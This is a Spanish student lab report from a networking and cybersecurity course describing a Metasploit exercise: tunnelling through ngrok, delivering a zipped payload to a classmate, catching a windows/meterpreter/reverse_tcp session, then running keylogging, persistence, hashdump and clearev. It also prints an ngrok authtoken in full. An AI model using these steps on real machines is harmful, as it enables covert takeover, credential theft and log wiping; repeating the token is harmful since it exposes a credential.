Kali-VPN

Page 1

Universidad Tecnológica de León Ingeniería en Redes Inteligentes y Ciberseguridad

Asignatura: Automatización de Infraestructura Digital II

Profesor: Juan Carlos Almonaci Puga

Título del trabajo: Kali-VPN

Presenta: Porras Noriega Fátima Abigail

Matrícula: 18002125

Grupo: IRIC 1001

León, Guanajuato. A 12 de octubre de 2021


Los pasos que se llevaron a cabo en la práctica realizada fueron los siguientes: Para la primera parte de la creación de la VPN inició sesión en Ngrok, desde el sitio https://ngrok.com y al iniciar sesión nos dirigimos a la sección Your Authtoken.

En esta sección, fue necesario guardar el authtoken que nos dieron ya que posteriormente serviría para iniciar el servicio de Ngrok en Linux, este fue ./ngrok authtoken 1zQnXPRJBplBkY4REZctPX7mWTa_3Mb4jBfV9z63h6jW5zfGa. Posterior a esto, se descargó Ngrok en nuestra máquina Kali:


Ya en Kali ingresamos a la carpeta de descargas (cd Downloads/) y se descomprimió el archivo de Ngrok previamente descargado con el comando unzip ngrok-stable-linuxamd64.zip.

El

siguiente

comando

que

se

ejecutó

fue

el

de

./ngrok

authtoken

1zQnXPRJBplBkY4REZctPX7mWTa_3Mb4jBfV9z63h6jW5zfGa para que el archivo del authtoken se guardara en la máquina.

Posteriormente se ejecutó el comando ./ngrok tcp 443 con la intención de iniciar una sesión de Ngrok y poder observar que estuviera activa la sesión.


En el comando ejecutado anteriormente es importante tener en cuenta el campo forwarding ya que los datos 8.tcp.ngrok.io y 15047 serán el LHOST y LPORT respectivamente más adelante.

El siguiente paso fue comprimir a zip el payload que se creó y moverlo a la carpeta del servidor web de Ngrok de modo que la otra persona, desde su equipo, pudiera de manera remota ingresar a la dirección IP de nuestra máquina seguido del nombre del archivo, en este caso Davidpayload.zip:


Importante tomar en cuenta que antes de ejecutar el payload en el otro pc, se debe ejecuta el comando msfconsole:

Dentro de la Aplicación Metasploit ejecutar el comando use exploit/multi/handler:

Volver a ejecutar el comando set payload windows/meterpreter/reverse_tcp y usando el método PAYLOAD configurar la IP local y el puerto a utilizar con los comandos set LHOST (IP_LOCAL), set LPORT (puerto):

Aquí el otro usuario, de la otra máquina se supone que ya debería haber ejecutado el payload en su máquina, por lo que se debió ejecutar el comando exploit para comenzar a ver toda la actividad de manera remota:


Regresar a KALI y ejecutar en metasploit el comando sessions 1 -i:

Algunas de las opciones que se utilizaron en la máquina del compañero en metasploit fueron las siguientes: •

sysinfo:

getsystem:

ipconfig:

screenshot:

Como se puede visualizar en la siguiente imagen, es la captura de pantalla guardada.


keyscan_start: Inicia keylogger y deja una captura de todo lo capturado en el teclado de la computadora:

La siguiente captura de pantalla muestra un ejemplo de texto escrito en una nota de Windows, en ella se escribió el mensaje “Hola, me llamo Abigail Porras”. Lo cual servirá en el siguiente comando para el keylogger.

keyscan_dump:


keyscan_stop:

run persistence -X:

hashdump:

execute:

Y en Windows se abre la calculadora:


clearev:


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.